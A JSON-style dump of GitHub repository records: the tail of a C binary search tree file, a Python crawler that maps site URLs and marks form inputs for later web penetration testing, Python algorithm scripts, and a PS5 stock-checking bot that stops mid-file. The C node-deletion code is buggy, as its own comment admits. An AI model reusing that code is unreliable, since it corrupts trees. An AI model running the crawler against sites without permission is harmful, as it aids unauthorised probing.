*/\n parentP = FindParentNode(tree,key);\n \n /* copy deleted node's element into a variable to return */\n deleted = currentP->element;\n \n /* case for deletion if node is a leaf */\n if ((currentP->left == NULL) && (currentP->right == NULL))\n {\n\t\t if(parentP==NULL)\n tree->root=NULL;\n\t else\n if(currentP==parentP->left)\n parentP->left=NULL;\n\t\t else\n\t\t parentP->right=NULL;\n\t }\n /* set left and right pointers of parent node to NULL */\n /* if (parentP->left == currentP)\n parentP->left = NULL;\n else if (parentP->right == currentP)\n parentP->right = NULL;\n }*/\n \n\t\n\n\t/* case for deletion if node has a left branch and no right branch */\n else if ((currentP->left != NULL) && (currentP->right == NULL))\n {\n\t\t\n if (parentP->left == currentP)\n parentP->left = currentP->left;\n else if (parentP->right == currentP)\n parentP->right = currentP->left;\n }\n\n /* case for deletion if node has a right branch and no left branch */\n else if ((currentP->right != NULL) && (currentP->left == NULL))\n {\n if (parentP->left == currentP)\n parentP->left = currentP->right;\n else if (parentP->right == currentP)\n parentP->right = currentP->right;\n }\n /* case for deletion if node has two branches */\n else if ((currentP->left != NULL) && (currentP->right != NULL))\n {\n /* this type of deletion involves finding the largest key node in the */\n /* left subtree and basically swaps the element of the largest node */\n /* with the node to be deleted, relinks the tree, and frees the max node */\n \n /* find largest key node and its parent in left subtree */\n max_nodeP = FindMaxNode(currentP->left);\n max_node_parP = FindParentNode(tree,max_nodeP->element.key);\n \n /* if maximum key node is a leaf and it's parent is not equal */\n /* to current, then set the left and right pointers of the parent */\n /* to NULL, else just have the parent's left pointer point to NULL */\n /* so that the right subtree of the deleted node is not lost. */\n \n\n\n\t\t/* The deletion code below is not right */\n\n\n /* Dzul's refine */\n \n if ((max_node_parP->right == max_nodeP) && (max_nodeP->left == NULL))\n {\n /* swap max node element into deleted node */\n currentP->element = max_nodeP->element; \n /* have current point to max to free the maximum key node */\n currentP = max_nodeP; \n \n max_node_parP->right = NULL; \n }\n \n else if ((max_node_parP->right == max_nodeP) && (max_nodeP->left != NULL))\n {\n temp_node->right = max_nodeP->left;\n \n /* swap max node element into deleted node */\n currentP->element = max_nodeP->element; \n /* have current point to max to free the maximum key node */\n currentP = max_nodeP; \n \n max_node_parP->right = temp_node;\n \n }\n \n else if ((max_node_parP->left == max_nodeP) && (max_nodeP->left == NULL))\n {\n /* swap max node element into deleted node */\n currentP->element = max_nodeP->element; \n /* have current point to max to free the maximum key node */\n currentP = max_nodeP; \n max_node_parP->left = NULL; \n }\n \n else if ((max_node_parP->left == max_nodeP) && (max_nodeP->left != NULL))\n {\n temp_node = max_nodeP->left;\n \n /* swap max node element into deleted node */\n currentP->element = max_nodeP->element; \n /* have current point to max to free the maximum key node */\n currentP = max_nodeP; \n \n max_node_parP->left = temp_node;\n max_nodeP == NULL; \n }\n \n /*\n if ((max_nodeP->left == NULL) && (max_nodeP->right == NULL))\n { \n\n if (max_node_parP != currentP)\n {\n max_node_parP->left = NULL;\n max_node_parP->right = NULL;\n \n\t\t\n }\n else \n max_node_parP->left = NULL;\n } \n else\n max_node_parP->right = NULL;\n \n /* swap max node element into deleted node */\n /*currentP->element = max_nodeP->element; */\n /* have current point to max to free the maximum key node */\n /*currentP = max_nodeP; */\n } \n }\n }\n //free(max_nodeP); /* deallocate memory of current node */\n return deleted;\n }\n \n /*\n * Function: TreeFind\n * ------------------\n * This procedure takes in a key and searches the tree for an\n * element with that key. If it finds an element with the key,\n * it returns a pointer to that element. If not, the function\n * will return NULL.\n */\n treeElementT *TreeFind(treeADT tree, treeKeyT key)\n {\n treeNodeT *currentP; /* pointer to the current tree node */\n \n currentP = tree->root; /* set current to the root of the tree */\n \n /* search for the key */\n while (currentP != NULL)\n {\n if (key == currentP->element.key)\n return &currentP->element; /* return pointer to element if key's match */\n /* move current left or right if keys don't match */\n else if (key < currentP->element.key)\n currentP = currentP->left;\n else if (key > currentP->element.key)\n currentP = currentP->right; \n }\n return NULL;\n }\n \n /*\n * Function: TreePrint\n * -------------------\n * This procedure checks if the tree is empty. If empty, an\n * error message is printed, otherwise RecTreePrint is called\n * to print the elements of the tree in preorder.\n */\n void TreePrint(treeADT tree, FILE *outfileP)\n {\n if (tree->root == NULL)\n printf(\"Error!! There are no elements in the tree to be printed.\\n\\n\");\n /* ^^ Not an error condition -- TF */\n else\n RecTreePrint(tree->root,outfileP);\n }\n \n /*\n * Function: RecTreePrint\n * ----------------------\n * This procedure is a recursive function which prints out\n * elements of a tree in preorder.\n */\n static void RecTreePrint(treeNodeT *root, FILE *outfileP)\n {\n if (root == NULL) /* base case to stop recursing */\n return;\n else\n {\n PrintElement(root->element,outfileP); /* print root element */\n RecTreePrint(root->left,outfileP); /* traverse left node */\n RecTreePrint(root->right,outfileP); /* traverse right node */\n }\n }\n \n /*\n * Function: FindCurrentNode\n * -------------------------\n * This is a helper function which returns\n * a pointer to a key's node.\n */\n static treeNodeT *FindCurrentNode(treeADT tree, treeKeyT key)\n {\n treeNodeT *currentP; /* pointer to the current tree node */\n \n currentP = tree->root; /* set current to the root node of the tree */\n \n while (currentP != NULL)\n {\n if (key == currentP->element.key)\n return currentP;\n /* move current left or right accordingly */\n else if (key < currentP->element.key)\n currentP = currentP->left;\n else if (key > currentP->element.key)\n currentP = currentP->right; \n }\n return NULL;\n }\n \n /*\n * Function: FindParentNode\n * ------------------------\n * This is a helper function which returns\n * a pointer to the parent of a key's node.\n */\n static treeNodeT *FindParentNode(treeADT tree, treeKeyT key)\n {\n treeNodeT *currentP, /* pointer to the current tree node */\n *parentP; /* pointer to the parent of the current node */\n \n parentP = NULL;\n currentP = tree->root; /* set current to the root node of the tree */\n \n while (currentP != NULL)\n {\n if (key == currentP->element.key)\n return parentP;\n /* increment parent and current pointers accordingly */\n else if (key < currentP->element.key)\n {\n parentP = currentP;\n currentP = currentP->left;\n }\n else if (key > currentP->element.key)\n {\n parentP = currentP;\n currentP = currentP->right; \n }\n }\n return NULL;\n }\n \n /*\n * Function: FindMaxNode\n * ---------------------\n * This is a helper function which returns a \n * pointer to the largest key node in a tree.\n */ \n static treeNodeT *FindMaxNode(treeNodeT *root)\n {\n if (root != NULL)\n while (root->right != NULL)\n root = root->right;\n \n return root;\n }\n" } ]
5
teuthemonsoon/url_collection
https://github.com/teuthemonsoon/url_collection
ecc1bbcf92f1c412ebf2e5442195615624e338ad
a424ec7a0f0dbac0b57eaaf5b502478db09c8845
63a6f47d06ca8d698e115fbd79c521e784df0dfb
refs/heads/master
2020-03-14T07:07:39.078545
2018-05-02T17:42:59
2018-05-02T17:42:59
131,497,404
2
0
null
null
null
null
null
[ { "alpha_fraction": 0.564311146736145, "alphanum_fraction": 0.5721911787986755, "avg_line_length": 40.85638427734375, "blob_id": "f6e23c018e8804bba79fcf965d5b13dd08cb3749", "content_id": "dfc9c476d9508d575892854a38bfb1c10abe5b75", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8266, "license_type": "no_license", "max_line_length": 157, "num_lines": 188, "path": "/sanitized_url_collection.py", "repo_name": "teuthemonsoon/url_collection", "src_encoding": "GB18030", "text": "# encoding=utf-8\nimport requests\nfrom bs4 import BeautifulSoup\nimport re,urlparse,os\nimport sys\n\nINPUT_SIGN=\"{{__INPUT__}}\"\nheaders={\"User-Agent\":\"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\",\n \"Accept\":\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\",\n \"Accept-Language\":\"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3\",\n \"Accept-Encoding\":\"\"}\nREWRITE_TYPE=[\"normal\",\"path\"]\n\nclass crawler:\n def __init__(self,url,deepest=5): #采用基于广度的搜索算法,默认规定深度最大值为5\n self.host=url\n self.url_rewrite_type=self.url_rewrite_type()\n self.list_opt=list_opt()\n self.deepest=deepest\n self.list_opt.add_url_to_unvisited(url)\n self.url_count_at_one_depth = 1\n self.depth=1\n\n def url_rewrite_type(self):\n return REWRITE_TYPE[0] #todo:判断urlrewrite模式\n # 当前默认为普通模式\n\n def crawl(self):\n while self.depth<=self.deepest and self.list_opt.count_unvisited() > 0:\n# print self.list_opt.get_unvisted()\n return_html=self.request(self.list_opt.unvisited[0])\n if return_html == False:\n continue\n urllist=self.graburl(return_html)\n for url in urllist:\n query_string = urlparse.urlparse(url).query\n query_args = dict([(k, v[0]) for k, v in urlparse.parse_qs(query_string).items()]) # 得到所有的query值然后转为dict\n query_path = urlparse.urlparse(url).path\n\n if (not self.exists_or_similar(url)):\n self.list_opt.unvisited.append(url)\n self.list_opt.visited_url_args_map.setdefault(query_path, []).append(query_args)\n # {'path1': [{'param2': 'aaa', 'param1': 'www'}, {'param2': 'bbb', 'param1': 'www'}]}\n if self.url_count_at_one_depth==0:\n self.depth+=1\n self.url_count_at_one_depth+=len(urllist)\n return self.list_opt.get_visited()\n\n def request(self,url):\n req=requests.session()\n print \"requesting to \"+url\n try:\n return_html=req.get(url,headers=headers,timeout=4,allow_redirects=False).content\n except requests.exceptions.Timeout or requests.exceptions.ConnectionError:\n print \"request to \"+url+\" failed..retrying...\"\n for i in xrange(1,2):\n retry=requests.get(url,headers,timeout=3,allow_redirects=False)\n if retry.status_code:\n return_html=retry.content\n break\n return False\n except Exception:\n print \"requests unknown error,probobly network error or your ip has been banned.\"\n return False\n self.url_count_at_one_depth-=1\n self.list_opt.unvisited.remove(url)\n self.list_opt.visited.append(url)\n self.list_opt.current_url=url\n return return_html\n\n def graburl(self,html):\n urllist = []\n soup=BeautifulSoup(html,\"lxml\")\n adomlist = soup.findAll(\"a\", {\"href\": re.compile(\".*\")})\n formdomlist=soup.findAll(\"form\",{\"action\":re.compile(\".*\")})\n\n for form in formdomlist:\n parsed_path = self.parse_form_path(form.attrs[\"action\"])\n if parsed_path == False:\n continue\n if (not form.attrs.has_key(\"method\")) or form.attrs[\"method\"].lower()==\"get\":#只取method为get的表单\n inputlist=form.select(\"input\")\n formGeneratedUrl=parsed_path+\"?\"\n for singleinput in inputlist:\n if singleinput.attrs.has_key(\"name\"):\n if singleinput.attrs.has_key(\"value\"):\n if singleinput.attrs.has_key(\"type\") and singleinput.attrs[\"type\"].lower()==\"hidden\":\n formGeneratedUrl+= singleinput.attrs[\"name\"]+\"=\"+singleinput.attrs[\"value\"]+\"&\"\n else:\n formGeneratedUrl += singleinput.attrs[\"name\"]+\"=\"+INPUT_SIGN+\"&\" #将给正常访问用户可控的input字段标上INPUT_SIGN\n formGeneratedUrl=formGeneratedUrl[:-1]\n else:\n formGeneratedUrl=self.parse_form_path(form.attrs[\"action\"])\n urllist.append(formGeneratedUrl)\n\n for i in adomlist:\n url = self.evaluate_and_parse_url(i.attrs[\"href\"])\n if url:\n urllist.append(url)\n return urllist\n\n def exists_or_similar(self,url):\n #判断url是否已经在已访问列表或未访问列表存在\n if url in self.list_opt.get_unvisted() or url in self.list_opt.get_visited():\n return True\n else:\n if self.url_rewrite_type == \"normal\":\n query_string=urlparse.urlparse(url).query\n if query_string=='':\n return False\n query_path=urlparse.urlparse(url).path\n query_raw_args=urlparse.parse_qs(query_string)\n query_args = dict([(k, v[0]) for k, v in query_raw_args.items()])\n same_path_args=self.list_opt.visited_url_args_map.get(query_path)\n if same_path_args==[{}] or same_path_args==None :#没有相同路径下的参数集\n return False\n same_path_keys_list=[]\n [same_path_keys_list.append(one.keys()) for one in same_path_args]\n for same_path_key in same_path_keys_list:\n if set(query_args.keys()) == set(same_path_key):#参数是否完全一致,若一致,则检查是否已有同类型的url\n for query_key, query_value in query_args.items():\n value_of_same_key = [single.get(query_key) for single in same_path_args if single.get(query_key) != None]#拿出所有带有相同key的非None的value\n if len(list(set(value_of_same_key)))>=5:#若相同的参数在已访问列表中有超过5个以上不同的值,则认为相似\n return True\n return False\n\n\n def evaluate_and_parse_url(self,url):\n if self.url_belong_to_host(url):\n if urlparse.urlparse(url).scheme == '':\n url=urlparse.urlparse(self.host).scheme+\":\"+url\n return url\n elif not re.match(r\"^(\\S+):\", url):#排除伪协议及外部网站\n return urlparse.urljoin(self.host,url)\n else :return False\n\n def parse_form_path(self,formaction):\n #以//为开头的form action值 表示http/https\n if formaction.startswith(\"//\"):\n schema=urlparse.urlparse(self.host)[0]\n url=schema+\":\"+formaction\n if self.url_belong_to_host(url):\n return url\n else:return False\n #以/为起始的form action值 表示在网站根目录\n elif formaction.startswith(\"/\"):\n return urlparse.urljoin(self.host,formaction)\n #判断类似index.php的form action值\n else:\n parselist=urlparse.urlparse(self.list_opt.get_current_url())\n parsed_path=parselist.path\n if parselist.path.endswith(\"/\"):\n parsed_path=parselist.path[:-1]\n path=os.path.split(parselist.path)[0]\n return urlparse.urljoin(self.host,path,formaction)\n\n def url_belong_to_host(self,url):\n parsed_list=urlparse.urlparse(url)\n if parsed_list.netloc==urlparse.urlparse(self.host).netloc:\n return True\n else:return False\n\n\nclass list_opt:\n def __init__(self):\n self.visited = []\n self.unvisited = []\n self.current_url=\"\"\n self.visited_url_args_map = {}\n\n def add_url_to_unvisited(self,url):\n self.unvisited.append(url)\n def add_url_to_visited(self,url):\n self.visited.append(url)\n def get_unvisted(self):\n return self.unvisited\n def count_unvisited(self):\n return len(self.unvisited)\n def get_visited(self):\n return self.visited\n def get_current_url(self):\n return self.current_url\n\n\nif __name__ ==\"__main__\":\n host=sys.argv[1]\n c=crawler(host)\n print crawler.crawl(c)" }, { "alpha_fraction": 0.5786993503570557, "alphanum_fraction": 0.5881243944168091, "avg_line_length": 37.17266082763672, "blob_id": "0f852040d0ed30918f82f7cab883c109cc4a566a", "content_id": "5346422a92ec55b8e692838279b322ac1bdabc99", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5577, "license_type": "no_license", "max_line_length": 128, "num_lines": 139, "path": "/url_collection.py", "repo_name": "teuthemonsoon/url_collection", "src_encoding": "GB18030", "text": "# encoding=utf-8\nimport requests\nfrom bs4 import BeautifulSoup\nimport re,urlparse,os\nimport sys\n\nINPUT_SIGN=\"{{__INPUT__}}\"\nheaders={\"User-Agent\":\"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\",\n \"Accept\":\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\",\n \"Accept-Language\":\"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3\",\n \"Accept-Encoding\":\"\"}\nREWRITE_TYPE=[\"normal\",\"path\"]\n\nclass crawler:\n def __init__(self,url,deepest=5): #采用基于广度的搜索算法,默认规定深度最大值为5\n self.host=url\n self.url_rewrite_type=self.url_rewrite_type()\n self.list_opt=list_opt()\n self.deepest=deepest\n self.list_opt.add_url_to_unvisited(url)\n self.url_count_at_one_depth = 1\n self.depth=1\n\n def url_rewrite_type(self):\n return REWRITE_TYPE[0] #todo:判断urlrewrite模式\n # 当前默认为普通模式\n\n def crawl(self):\n while self.depth<=self.deepest and self.list_opt.count_unvisited() > 0:\n# print self.list_opt.get_unvisted()\n html=self.request(self.list_opt.unvisited[0])\n urllist=self.graburl(html)\n for url in urllist:\n if (not self.exists_or_similar(url)):\n self.list_opt.unvisited.append(url)\n if self.url_count_at_one_depth==0:\n self.depth+=1\n self.url_count_at_one_depth+=len(urllist)\n return self.list_opt.get_visited()\n\n def request(self,url):\n req=requests.session()\n print \"requesting to \"+url\n try:\n html=req.get(url,headers=headers).content\n except: Exception\n query_string=urlparse.urlparse(url).query\n# query_args={[(k,v[0]) for k,v in urlparse.parse_qs(query_string).items()]} #得到所有的query值然后转为dict\n self.url_count_at_one_depth-=1\n self.list_opt.unvisited.remove(url)\n self.list_opt.visited.append(url)\n# self.list_opt.visited_url_args_map.append({url:query_args})\n self.list_opt.current_url=url\n return html\n\n def graburl(self,html):\n urllist = []\n soup=BeautifulSoup(html,\"lxml\")\n adomlist = soup.findAll(\"a\", {\"href\": re.compile(\".*\")})\n formdomlist=soup.findAll(\"form\",{\"action\":re.compile(\".*\")})\n for form in formdomlist:\n if (not form.attrs.has_key(\"method\")) or form.attrs[\"method\"].lower()==\"get\":#只取method为get的表单\n inputlist=form.select(\"input\")\n formGeneratedUrl=self.parse_form_path(form.attrs[\"action\"])+\"?\"\n for singleinput in inputlist:\n if singleinput.attrs.has_key(\"name\"):\n if singleinput.attrs.has_key(\"value\"):\n if singleinput.attrs.has_key(\"type\") and singleinput.attrs[\"type\"].lower()==\"hidden\":\n formGeneratedUrl+= singleinput.attrs[\"name\"]+\"=\"+singleinput.attrs[\"value\"]+\"&\"\n else:\n formGeneratedUrl += singleinput.attrs[\"name\"]+\"=\"+INPUT_SIGN+\"&\" #将给正常访问用户可控的input字段标上INPUT_SIGN\n formGeneratedUrl=formGeneratedUrl[:-1]\n else:\n formGeneratedUrl=self.parse_form_path(form.attrs[\"action\"])\n urllist.append(formGeneratedUrl)\n\n for i in adomlist:\n url = self.evaluate_and_parse_url(i.attrs[\"href\"])\n if url:\n urllist.append(url)\n return urllist\n\n def exists_or_similar(self,url):\n #判断url是否已经在已访问列表或未访问列表存在\n if url in self.list_opt.get_unvisted() or url in self.list_opt.get_visited():\n return True\n\t\t#todo: 判断url是否与先前的相似\n\t\t\t\n def evaluate_and_parse_url(self,url):\n if url.startswith(self.host):\n return url\n elif not re.match(r\"^(\\S+):\", url):#排除伪协议以及host之外的网站\n return urlparse.urljoin(self.host,url)\n else :return False\n\n def parse_form_path(self,formaction):\n #以//为开头的form action值 表示http/https\n if formaction.startswith(\"//\"):\n schema=urlparse.urlparse(self.host)[0]\n url=schema+\":\"+formaction\n if url.startswith(self.host):\n return url\n #以/为起始的form action值 表示在网站根目录\n elif formaction.startswith(\"/\"):\n return self.host+formaction\n #判断类似index.php的form action值\n else:\n parselist=urlparse.urlparse(self.list_opt.get_current_url())\n parsed_path=parselist.path\n if parselist.path.endswith(\"/\"):\n parsed_path=parselist.path[:-1]\n path=os.path.split(parselist.path)[0]\n return self.host+urlparse.urljoin(path,formaction)\n\nclass list_opt:\n def __init__(self):\n self.visited = []\n self.unvisited = []\n self.current_url=\"\"\n self.visited_url_args_map = {}\n\n def add_url_to_unvisited(self,url):\n self.unvisited.append(url)\n def add_url_to_visited(self,url):\n self.visited.append(url)\n def get_unvisted(self):\n return self.unvisited\n def count_unvisited(self):\n return len(self.unvisited)\n def get_visited(self):\n return self.visited\n def get_current_url(self):\n return self.current_url\n\n\nif __name__ ==\"__main__\":\n host=sys.argv[1]\n c=crawler(host)\n print crawler.crawl(c)" }, { "alpha_fraction": 0.7447698712348938, "alphanum_fraction": 0.7489539980888367, "avg_line_length": 16.071428298950195, "blob_id": "a1009b7490614110d66b3f17ea32fe6bc39fad8f", "content_id": "a5704ef1938986e20b00add46cde6e8b0491b9e2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 397, "license_type": "no_license", "max_line_length": 46, "num_lines": 14, "path": "/README.md", "repo_name": "teuthemonsoon/url_collection", "src_encoding": "UTF-8", "text": "# url_collection\n编写web渗透工具的基石<br>\n<br>\n使用`基于广度`的搜索算法爬取url,默认最大深度为`5`<br>\n可从\n`<a href=${url}>`\n及从form表单中提取url并自动拼接参数<br>\n## 用法\npython url_collection.py http://www.tenteu.com\n\n## todo\n将增加对url相似度的识别<br>\n将增加在js中提取url<br>\n将增加对本域名及其子域的url搜集<br>\n" } ]
3
Anmol2929/Awesome-Python-Script
https://github.com/Anmol2929/Awesome-Python-Script
be880c09d599a66250b2269f5d0da5b13ee3b9a3
8831a6b51a48dbcee6dcb0141c4b3b01bac3940d
2de9b4d08ce8e58f431e9b224f1d80a6d4940ca1
refs/heads/main
2023-08-17T20:27:29.738457
2021-10-02T16:53:50
2021-10-02T16:53:50
412,579,464
0
3
MIT
2021-10-01T18:34:01
2021-10-01T19:27:54
2021-10-02T16:53:50
Python
[ { "alpha_fraction": 0.5891719460487366, "alphanum_fraction": 0.6226114630699158, "avg_line_length": 26.636363983154297, "blob_id": "48b5a1fd4cd109649d564488edefbb73ab831ab1", "content_id": "fae028da29cd502410ea2f95f2f86eccf7e5845f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 628, "license_type": "permissive", "max_line_length": 83, "num_lines": 22, "path": "/Kadanes_algo.py", "repo_name": "Anmol2929/Awesome-Python-Script", "src_encoding": "UTF-8", "text": "# Main Function to find Maximum Subarray Sum\r\n\r\ndef maxSubArraySum(a):\r\n \r\n max_now = 0\r\n total_max = -9999999999 # Initializing variables with 0 and Negative Infinity\r\n\r\n # Traversing in List/Array\r\n\r\n for i in range(0,len(a)):\r\n # Finding out Current Maximum Sum in List/Array\r\n total_max = max(a[i],total_max+a[i]) \r\n # Comparing the Current Maximum Sum with Previous One\r\n max_now = max(max_now,total_max)\r\n\r\n # This will return Maximum Subarray Sum\r\n return max_now \r\n\r\n\r\n# Driver Code\r\na = [-2, -3, 4, -1, -2, 1, 5, -3] \r\nprint(\"Maxium Subarray sum is\",maxSubArraySum(a))" }, { "alpha_fraction": 0.34934496879577637, "alphanum_fraction": 0.4104803502559662, "avg_line_length": 15.666666984558105, "blob_id": "718c0cbb20a7c6c27a500cf544939057229b1eaa", "content_id": "ae7895fc5bd028fd710ad8b89d7092d209290c2f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 687, "license_type": "permissive", "max_line_length": 44, "num_lines": 39, "path": "/Radix_sort.py", "repo_name": "Anmol2929/Awesome-Python-Script", "src_encoding": "UTF-8", "text": "def counting_sort(A, Exp):\r\n n = len(A)\r\n\r\n count = [0] * (10)\r\n\r\n for i in range(0, n):\r\n index = A[i] // Exp\r\n count[index % 10] += 1\r\n\r\n\r\n for i in range(1, 10):\r\n count[i] = count[i]+count[i - 1]\r\n\r\n output = [0] * (n)\r\n\r\n i = n - 1\r\n while i >= 0:\r\n index = A[i] // Exp\r\n output[count[index % 10] - 1] = A[i]\r\n count[index % 10] -= 1\r\n i = i- 1\r\n\r\n i = 0\r\n for i in range(0, len(A)):\r\n A[i] = output[i]\r\n\r\n\r\ndef radix_sort(A):\r\n\r\n Max = max(A)\r\n\r\n Exp = 1\r\n while Max / Exp > 0:\r\n counting_sort(A, Exp)\r\n Exp *= 10\r\n\r\nA = [130, 12, 85, 102, 25, 20, 2]\r\nradix_sort(A)\r\nprint(A)" }, { "alpha_fraction": 0.3543599247932434, "alphanum_fraction": 0.3970315456390381, "avg_line_length": 21.478260040283203, "blob_id": "c716b6715ddc986d6ee392ff30366797a7eb9935", "content_id": "c831c7a7fac4d152ea61da5a010c36bc6e5003d3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1078, "license_type": "permissive", "max_line_length": 56, "num_lines": 46, "path": "/Longest_common_subsequence.py", "repo_name": "Anmol2929/Awesome-Python-Script", "src_encoding": "UTF-8", "text": "# Python program for Finding Longest Common Subsequence\r\n\r\n# Function to find lcs_algo\r\ndef lcs_algo(S1, S2, m, n):\r\n L = [[0 for x in range(n+1)] for x in range(m+1)]\r\n\r\n # Building the mtrix in bottom-up way\r\n for i in range(m+1):\r\n for j in range(n+1):\r\n if i == 0 or j == 0:\r\n L[i][j] = 0\r\n elif S1[i-1] == S2[j-1]:\r\n L[i][j] = L[i-1][j-1] + 1\r\n else:\r\n L[i][j] = max(L[i-1][j], L[i][j-1])\r\n\r\n index = L[m][n]\r\n\r\n lcs_algo = [\"\"] * (index+1)\r\n lcs_algo[index] = \"\"\r\n\r\n i = m\r\n j = n\r\n while i > 0 and j > 0:\r\n\r\n if S1[i-1] == S2[j-1]:\r\n lcs_algo[index-1] = S1[i-1]\r\n i -= 1\r\n j -= 1\r\n index -= 1\r\n\r\n elif L[i-1][j] > L[i][j-1]:\r\n i -= 1\r\n else:\r\n j -= 1\r\n \r\n # Printing the sub sequences\r\n print(\"S1 : \" + S1 + \"\\nS2 : \" + S2)\r\n print(\"LCS: \" + \"\".join(lcs_algo))\r\n\r\n\r\nS1 = \"ABCDEFGH\"\r\nS2 = \"ABZCDXEFYGH\"\r\nm = len(S1)\r\nn = len(S2)\r\nlcs_algo(S1, S2, m, n)" }, { "alpha_fraction": 0.8260869383811951, "alphanum_fraction": 0.8260869383811951, "avg_line_length": 23, "blob_id": "9947acca3c7ea0b5a907acb021fbc754c9b4e91d", "content_id": "4f22fdd4ca2bb0e01ec75951711ba292f188f060", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 23, "license_type": "permissive", "max_line_length": 23, "num_lines": 1, "path": "/README.md", "repo_name": "Anmol2929/Awesome-Python-Script", "src_encoding": "UTF-8", "text": "# Awesome-Python-Script" } ]
4
DomStan/ps5-bot
https://github.com/DomStan/ps5-bot
8d717f1b497c921b56a5474a696e387838970bb0
cb250d260e71cf2ef9cd100e06cd4e9038e8fe7e
03b4d20bf8a6a9de0a4c6c70fe86993041d1cc46
refs/heads/main
2023-06-15T07:36:14.377454
2023-06-11T09:07:01
2023-06-11T09:07:01
355,663,367
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7489177584648132, "alphanum_fraction": 0.7705627679824829, "avg_line_length": 24.66666603088379, "blob_id": "8ea90be4c7f20662ed6f569979020aeb1dac55b1", "content_id": "367d43dc2790207b09be48427c6b871a3099e1b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 231, "license_type": "no_license", "max_line_length": 43, "num_lines": 9, "path": "/README.md", "repo_name": "DomStan/ps5-bot", "src_encoding": "UTF-8", "text": "# ps5-bot\nBot that checks online shops for PS5 stock.\n\n# Prerequisites (Ubuntu/Debian):\n- sudo apt install firefox\n- sudo apt install xvfb\n- sudo apt install python3-pip\n- sudo pip3 install selenium\n- sudo pip3 install xvfbwrapper\n" }, { "alpha_fraction": 0.7868852615356445, "alphanum_fraction": 0.8032786846160889, "avg_line_length": 14.25, "blob_id": "e0e08b7c4b1ba898839d9f8b637c5b0fc4c36e64", "content_id": "07d074afc8923f7519a1ae9a94712c3f26207a05", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 61, "license_type": "no_license", "max_line_length": 15, "num_lines": 4, "path": "/stop-ps5.sh", "repo_name": "DomStan/ps5-bot", "src_encoding": "UTF-8", "text": "#!/usr/bin/bash\nkillall python3\nkillall firefox\nkillall Xvfb\n" }, { "alpha_fraction": 0.6750661134719849, "alphanum_fraction": 0.6827694773674011, "avg_line_length": 36.02577209472656, "blob_id": "2c9dbb46ac10da16f853c304894e6eccb6481fd7", "content_id": "5f2c1568e5a16e2925e7ba43f26be7bba9d2bccb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 21551, "license_type": "no_license", "max_line_length": 155, "num_lines": 582, "path": "/ps5.py", "repo_name": "DomStan/ps5-bot", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport time\nimport random\nfrom datetime import date\nimport logging\nimport sys\nimport os\nimport atexit\nimport requests\nimport json\n\nfrom selenium import webdriver\nfrom selenium.common.exceptions import StaleElementReferenceException\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.common.exceptions import InvalidSessionIdException\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.firefox.options import Options\nfrom selenium.webdriver.support.ui import WebDriverWait\n\nfrom xvfbwrapper import Xvfb\n\n# Start virtual display\nVDISPLAY = Xvfb()\nVDISPLAY.start()\n\n# Run firefox in headless mode\nOPTIONS = Options()\nOPTIONS.add_argument(\"--headless\")\n# Do not wait for page to fully load\nOPTIONS.page_load_strategy = 'none'\n\n# Makes pages load faster\nPROFILE = webdriver.FirefoxProfile()\nPROFILE.set_preference(\"browser.privatebrowsing.autostart\", True)\nPROFILE.set_preference(\"network.http.pipelining\", True)\nPROFILE.set_preference(\"network.http.proxy.pipelining\", True)\nPROFILE.set_preference(\"network.http.pipelining.maxrequests\", 8)\nPROFILE.set_preference(\"content.notify.interval\", 500000)\nPROFILE.set_preference(\"content.notify.ontimer\", True)\nPROFILE.set_preference(\"content.switch.threshold\", 250000)\nPROFILE.set_preference(\"browser.cache.memory.capacity\", 65536)\nPROFILE.set_preference(\"browser.startup.homepage\", \"about:blank\")\nPROFILE.set_preference(\"reader.parse-on-load.enabled\", False)\nPROFILE.set_preference(\"browser.pocket.enabled\", False)\nPROFILE.set_preference(\"loop.enabled\", False)\nPROFILE.set_preference(\"browser.chrome.toolbar_style\", 1)\nPROFILE.set_preference(\"browser.display.show_image_placeholders\", False)\nPROFILE.set_preference(\"browser.display.use_document_colors\", False)\nPROFILE.set_preference(\"browser.display.use_document_fonts\", 0)\nPROFILE.set_preference(\"browser.formfill.enable\", False)\nPROFILE.set_preference(\"browser.helperApps.deleteTempFileOnExit\", True)\nPROFILE.set_preference(\"browser.shell.checkDefaultBrowser\", False)\nPROFILE.set_preference(\"browser.startup.homepage\", \"about:blank\")\nPROFILE.set_preference(\"browser.startup.page\", 0)\nPROFILE.set_preference(\"browser.tabs.forceHide\", True)\nPROFILE.set_preference(\"browser.urlbar.autoFill\", False)\nPROFILE.set_preference(\"browser.urlbar.autocomplete.enabled\", False)\nPROFILE.set_preference(\"browser.urlbar.showPopup\", False)\nPROFILE.set_preference(\"browser.urlbar.showSearch\", False)\nPROFILE.set_preference(\"extensions.checkCompatibility\", False)\nPROFILE.set_preference(\"extensions.checkUpdateSecurity\", False)\nPROFILE.set_preference(\"extensions.update.autoUpdateEnabled\", False)\nPROFILE.set_preference(\"extensions.update.enabled\", False)\nPROFILE.set_preference(\"general.startup.browser\", False)\nPROFILE.set_preference(\"plugin.default_plugin_disabled\", 